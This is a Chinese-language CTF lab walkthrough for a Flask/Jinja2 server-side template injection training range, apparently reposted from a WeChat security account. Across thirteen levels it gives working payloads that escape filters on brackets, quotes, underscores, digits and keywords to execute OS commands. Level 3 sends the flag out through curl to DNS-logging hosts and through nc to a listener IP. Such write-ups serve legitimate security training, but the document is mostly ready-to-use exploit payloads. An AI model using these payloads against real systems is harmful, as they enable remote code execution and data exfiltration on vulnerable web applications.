环境
-
https://www.ctfer.vip/problem/13 -
源码:https://github.com/X3NNY/sstilabs
知识点
-
flask -
SSTI
解题思路
整个靶场如下:
如何确定python ssti模版注入:
-
中间件 -
返回信息(jinja2、flask) -
关键字提示
level 1
{{2*2}},output,4
{{config}}
Hello <Config {'ENV': 'production', 'DEBUG': False, 'TESTING': False, 'PROPAGATE_EXCEPTIONS': None, 'PRESERVE_CONTEXT_ON_EXCEPTION': None, 'SECRET_KEY': None, 'PERMANENT_SESSION_LIFETIME': datetime.timedelta(days=31), 'USE_X_SENDFILE': False, 'SERVER_NAME': None, 'APPLICATION_ROOT': '/', 'SESSION_COOKIE_NAME': 'session', 'SESSION_COOKIE_DOMAIN': None, 'SESSION_COOKIE_PATH': None, 'SESSION_COOKIE_HTTPONLY': True, 'SESSION_COOKIE_SECURE': False, 'SESSION_COOKIE_SAMESITE': None, 'SESSION_REFRESH_EACH_REQUEST': True, 'MAX_CONTENT_LENGTH': None, 'SEND_FILE_MAX_AGE_DEFAULT': datetime.timedelta(seconds=43200), 'TRAP_BAD_REQUEST_ERRORS': None, 'TRAP_HTTP_EXCEPTIONS': False, 'EXPLAIN_TEMPLATE_LOADING': False, 'PREFERRED_URL_SCHEME': 'http', 'JSON_AS_ASCII': True, 'JSON_SORT_KEYS': True, 'JSONIFY_PRETTYPRINT_REGULAR': False, 'JSONIFY_MIMETYPE': 'application/json', 'TEMPLATES_AUTO_RELOAD': None, 'MAX_COOKIE_SIZE': 4093}>{{config.SECRET_KEY}}
jinja2的payload可以使用
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %}
level 2
level2过滤了bl['{{']
这里过滤了{{,可以使用{%%}来绕过
使用burp爆破可以利用的类
{%print(''.__class__.__base__.__subclasses__()[346].__init__.__globals__['os'].popen('ls').read())%}
返回如下:
level 3
no waf and blind
发送任意请求包都返回如下内容:
盲注可采用dns外带的方式
payload如下:
{% for i in ''.__class__.__mro__[-1].__subclasses__() %}{% if i.__name__=='Popen' %}{{ i.__init__.__globals__['os'].popen('curl http://`cat flag`.pc1dd3.ceye.io').read()}}{% endif %}{% endfor %}
{{().__class__.__bases__[0].__subclasses__()[133].__init__.__globals__["popen"]("curl http://`cat flag`.1riscn.dnslog.cn").read()}}nc监听
{% for i in ''.__class__.__mro__[-1].__subclasses__() %}{% if i.__name__=='Popen' %}{{ i.__init__.__globals__['os'].popen('cat flag|nc 192.168.91.128 4444').read()}}{% endif %}{% endfor %}level 4
bl['[', ']']
过滤了中括号
对于索引的[]可以用pop()或__getitem__()代替[];而类的可以用__getattribute__绕过
{{''.__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(81).__init__.__globals__.__getitem__('__import__')('os').popen("env").read()}}
level 5
过滤了引号,bl[''', '"']
-
request绕过
{{().__class__.__bases__[0].__subclasses__()[81].__init__.__globals__[request.values.arg1].popen(request.values.arg2).read()}}POST:arg1=os&arg2=cat flag
payload:
POST /level/5 HTTP/1.1Host: node5.anna.nssctf.cn:28491Content-Length: 149Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedOrigin: http://node5.anna.nssctf.cn:28491Referer: http://node5.anna.nssctf.cn:28491/level/5Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=hdt08jc4bu052a9k34e0oocqd6Connection: closecode={{().__class__.__bases__[0].__subclasses__()[261].__init__.__globals__[request.values.arg1].popen(request.values.arg2).read()}}&arg1=os&arg2=env
-
使用cookie
{{().__class__.__mro__[-1].__subclasses__()[258].__init__.__globals__[request.cookies.arg1].popen(request.cookies.arg2).read()}}Cookie:arg1=os;arg2=cat flag
无法返回内容
-
chr()绕过
先找出chr()函数的位置
{{().__class__.__mro__[-1].__subclasses__()[§0§].__init__.__globals__.__builtins__.chr}}{%set chr=[].__class__.__mro__[-1].__subclasses__()[58].__init__.__globals__.__builtins__.chr%}{%print(().__class__.__mro__[-1].__subclasses__()[258].__init__.__globals__[chr(111)%2bchr(115)].popen(chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)).read())%}
无法返回内容
level 6
bl['_'],过滤了下划线
-
cookie绕过
?name={{(lipsum|attr(request.cookies.a)).os.popen(request.cookies.b).read()}}cookie:a=__globals__;b=cat /flag
-
十六位编码绕过
{{()["x5fx5fclassx5fx5f"]["x5fx5fmrox5fx5f"][-1]["x5fx5fsubclassesx5fx5f"]()[258]["x5fx5finitx5fx5f"]["x5fx5fglobalsx5fx5f"]["os"].popen("cat flag").read()}}-
url编码绕过
使用了lipsum这个方法直接调用os
{{lipsum|attr("u005fu005fglobalsu005fu005f")|attr("u005fu005fgetitemu005fu005f")("os")|attr("popen")("env")|attr("read")()}}
-
base64编码
{{()|attr('X19jbGFzc19f'.decode('base64'))|attr('X19iYXNlX18='.decode('base64'))|attr('X19zdWJjbGFzc2VzX18='.decode('base64'))()|attr('X19nZXRpdGVtX18='.decode('base64'))(258)|attr('X19pbml0X18='.decode('base64'))|attr('X19nbG9iYWxzX18='.decode('base64'))|attr('X19nZXRpdGVtX18='.decode('base64'))('os')|attr('popen')('cat flag')|attr('read')()}}-
attr()配合request
{{(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5)}}x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=__import__('os').popen('cat f*').read()
level 7
bl['.'],过滤了.
-
[]绕过[x]
{{''['__class__']['__bases__']['__subclasses__']()['__getitem__'](81)['__init__']['__globals__']['__getitem__']('__import__')('os')['popen']("env")['read']()}}-
url编码绕过 [√]
{{lipsum|attr("u005fu005fglobalsu005fu005f")|attr("u005fu005fgetitemu005fu005f")("os")|attr("popen")("env")|attr("read")()}}
另一种方式不行 [x]
{{()|attr('__class__')|attr('__base__')|attr('__subclasses__')()|attr('__getitem__')(258)|attr('__init__')|attr('__globals__')|attr('__getitem__')('os')|attr('popen')('env')|attr('read')()}}level 8
bl["class", "arg", "form", "value", "data", "request", "init", "global", "open", "mro", "base", "attr"]
关键字过滤
().__class__=()["__cla"+"ss__"] //这里的点被中括号代替了"".__class__.__base__.__subclasses__()[133].__init__.__globals__['popen']('env').read()变换为:
{{""["__cla"+"ss__"]["__ba"+"se__"]["__subcla"+"sses__"]()[133]["__in"+"it__"]["__glo"+"bals__"]['po'+'pen']('env').read()}}
或者使用for语句
{%for i in ""["__cla"+"ss__"]["__mr"+"o__"][1]["__subcla"+"sses__"]()%}{%if i.__name__ == "_wrap_close"%}{%print i["__in"+"it__"]["__glo"+"bals__"]["po"+"pen"]('env')["read"]()%}{%endif%}{%endfor%}或者使用json()过滤器拼接
dict(__in=a,it__=a)|join =__init__{%set a=dict(__cla=a,ss__=a)|join%}{%set b=dict(__ba=a,se__=a)|join%}{%set c=dict(__subcla=a,sses__=a)|join%}{%set d=dict(__in=a,it__=a)|join%}{%set e=dict(__glo=a,bals__=a)|join%}{%set h=dict(po=a,pen=a)|join%}{%print(""[a][b][c]()[133][d][e][h]('env').read())%}
level 9
bl['0-9'],过滤了数字
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %}
{{url_for.__globals__['__builtins__']['eval']("__import__('os').popen('env').read()")}}
level 10
set config = None
url_for.__globals__url_for.__globals__['current_app'].config
设置了config为空,利用current_app
{{url_for.__globals__['current_app'].config}}{{get_flashed_messages.__globals__['current_app'].config}}
level 11
bl[''', '"', '+', 'request', '.', '[', ']']
过滤了单引号、双引号、加号、request、点号,中括号
利用set来定义变量,点、中括号可以用attr替代,关键词用join替代
准备一个payload:
().__class__.__base__.__subclasses__()[133].__init__.__globals__['popen']('cat flag').read()修改后的payload如下:
{%set a=dict(__cla=a,ss__=b)|join %}{%set b=dict(__bas=a,e__=b)|join %}{%set c=dict(__subcla=a,sses__=b)|join %}{%set d=dict(__ge=a,titem__=a)|join%}{%set e=dict(__in=a,it__=b)|join %}{%set f=dict(__glo=a,bals__=b)|join %}{%set g=dict(pop=a,en=b)|join %}{%set h=self|string|attr(d)(18)%}{%set flag=dict(env=abc)|join%}{%set re=dict(read=a)|join%}{{()|attr(a)|attr(b)|attr(c)()|attr(d)(133)|attr(e)|attr(f)|attr(d)(g)(flag)|attr(re)()}}
-
另一种解法
通过lipsum来获取下划线
下划线的下标是18
{{(lipsum|string|list)|attr(pop)(18)}}
attr()里面要求的是字符串,直接输pop需要用引号''包围起来,但是这里又过滤了引号,所以要先构造一个pop字符串:
{% set pop=dict(pop=a)|join%}{% set xiahuaxian=(lipsum|string|list)|attr(pop)(18)%}
此时就能成功取到_,再用下划线去构造其他的类:
{% set globals=(xiahuaxian,xiahuaxian,dict(globals=a)|join,xiahuaxian,xiahuaxian)|join %}{% set getitem=(xiahuaxian,xiahuaxian,dict(getitem=a)|join,xiahuaxian,xiahuaxian)|join %}
再去构造后面用到的方法:
{% set space=(lipsum|string|list)|attr(pop)(9)%}{% set os=dict(os=a)|join %}{% set popen=dict(popen=a)|join%}{% set cat=dict(cat=a)|join%}{% set cmd=(cat)|join%}{% set read=dict(read=a)|join%}
最后就是完整的利用语法:
{{(lipsum|attr(globals))|attr(getitem)(os)|attr(popen)(cmd)|attr(read)()}}合在一起就是:
{% set pop=dict(pop=a)|join%}{% set xiahuaxian=(lipsum|string|list)|attr(pop)(18)%}{% set globals=(xiahuaxian,xiahuaxian,dict(globals=a)|join,xiahuaxian,xiahuaxian)|join %}{% set getitem=(xiahuaxian,xiahuaxian,dict(getitem=a)|join,xiahuaxian,xiahuaxian)|join %}{% set space=(lipsum|string|list)|attr(pop)(9)%}{% set os=dict(os=a)|join %}{% set popen=dict(popen=a)|join%}{% set cat=dict(env=a)|join%}{% set cmd=(cat)|join%}{% set read=dict(read=a)|join%}{{(lipsum|attr(globals))|attr(getitem)(os)|attr(popen)(cmd)|attr(read)()}}
level 12
bl['_', '.', '0-9', '\', ''', '"', '[', ']']
和level 11差不多,多过滤了个数字和下划线,用count来获取数字,构造pop来获取下划线即可
().__class__.__base__.__subclasses__()[133].__init__.__globals__['popen']('cat flag').read(){% set po=dict(po=a,p=a)|join%}{%set two=dict(aaaaaaaaaaaaaaaaaaaaaaaa=a)|join|count%}{% set x=(()|select|string|list)|attr(po)(two)%}{% print(x)%}
{% set po=dict(po=a,p=a)|join%}{%set two=dict(aaaaaaaaaaaaaaaaaaaaaaaa=a)|join|count%}{% set x=(()|select|string|list)|attr(po)(two)%}{%set eighteen=dict(aaaaaaaaaaaaaaaaaa=a)|join|count%}{%set hundred=dict(aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=a)|join|count%}{% set a=(x,x,dict(class=a)|join,x,x)|join()%}{%set b=(x,x,dict(base=a)|join,x,x)|join() %}{%set c=(x,x,dict(subclasses=a)|join,x,x)|join() %}{%set d=(x,x,dict(getitem=a)|join,x,x)|join()%}{%set e=(x,x,dict(init=b)|join,x,x)|join()%}{%set f=(x,x,dict(globals=b)|join,x,x)|join()%}{%set g=dict(pop=a,en=b)|join %}{%set h=self|string|attr(d)(eighteen)%}{%set flag=dict(env=abc)|join%}{%set re=dict(read=a)|join%}{{()|attr(a)|attr(b)|attr(c)()|attr(d)(hundred)|attr(e)|attr(f)|attr(d)(g)(flag)|attr(re)()}}
-
另一种解法
code={%set nine=dict(aaaaaaaaa=a)|join|count%}{%set eighteen=dict(aaaaaaaaaaaaaaaaaa=a)|join|count%}{% set pop=dict(pop=a)|join%}{% set xiahuaxian=(lipsum|string|list)|attr(pop)(eighteen)%}{% set globals=(xiahuaxian,xiahuaxian,dict(globals=a)|join,xiahuaxian,xiahuaxian)|join %}{% set getitem=(xiahuaxian,xiahuaxian,dict(getitem=a)|join,xiahuaxian,xiahuaxian)|join %}{% set space=(lipsum|string|list)|attr(pop)(nine)%}{% set os=dict(os=a)|join %}{% set popen=dict(popen=a)|join%}{% set cat=dict(env=a)|join%}{% set cmd=(cat)|join%}{% set read=dict(read=a)|join%}{{(lipsum|attr(globals))|attr(getitem)(os)|attr(popen)(cmd)|attr(read)()}}
level 13
bl['_', '.', '\', ''', '"', 'request', '+', 'class', 'init', 'arg', 'config', 'app', 'self', '[', ']']
过滤增添了一些关键词,其中self被ban,本来用它设置的空格,这里可以利用pop构造空格,简单修改一下之前的payload
code={% set po=dict(po=a,p=a)|join%}{%set one=dict(aaaaaaaaaaaaaaaaa=a)|join|count%}{%set two=dict(aaaaaaaaaaaaaaaaaaaaaaaa=a)|join|count%}{% set x=(()|select|string|list)|attr(po)(two)%}{%set eighteen=dict(aaaaaaaaaaaaaaaaaa=a)|join|count%}{%set hundred=dict(aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=a)|join|count%}{% set a=(x,x,dict(cla=a,ss=a)|join,x,x)|join()%}{%set b=(x,x,dict(base=a)|join,x,x)|join() %}{%set c=(x,x,dict(subcla=a,sses=a)|join,x,x)|join() %}{%set d=(x,x,dict(getitem=a)|join,x,x)|join()%}{%set e=(x,x,dict(ini=a,t=a)|join,x,x)|join()%}{%set f=(x,x,dict(globals=b)|join,x,x)|join()%}{%set g=dict(pop=a,en=b)|join %}{%set h=(()|select|string|list)|attr(po)(one)%}{%set flag=dict(env=abc)|join%}{%set re=dict(read=a)|join%}{{()|attr(a)|attr(b)|attr(c)()|attr(d)(hundred)|attr(e)|attr(f)|attr(d)(g)(flag)|attr(re)()}}
-
另一种解法
{% set pop=dict(pop=a)|join%}{% set xiahuaxian=(lipsum|string|list)|attr(pop)(18)%}{% set globals=(xiahuaxian,xiahuaxian,dict(globals=a)|join,xiahuaxian,xiahuaxian)|join %}{% set getitem=(xiahuaxian,xiahuaxian,dict(getitem=a)|join,xiahuaxian,xiahuaxian)|join %}{% set space=(lipsum|string|list)|attr(pop)(9)%}{% set os=dict(os=a)|join %}{% set popen=dict(popen=a)|join%}{% set cat=dict(env=a)|join%}{% set cmd=(cat)|join%}{% set read=dict(read=a)|join%}{{(lipsum|attr(globals))|attr(getitem)(os)|attr(popen)(cmd)|attr(read)()}}
参考
https://tttang.com/archive/1698/#toc_level-8
https://johnfrod.top/ctf/flask-ssti-lab%E6%94%BB%E7%95%A5/
原文始发于微信公众号(ListSec):Flask SSTI靶场记录
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论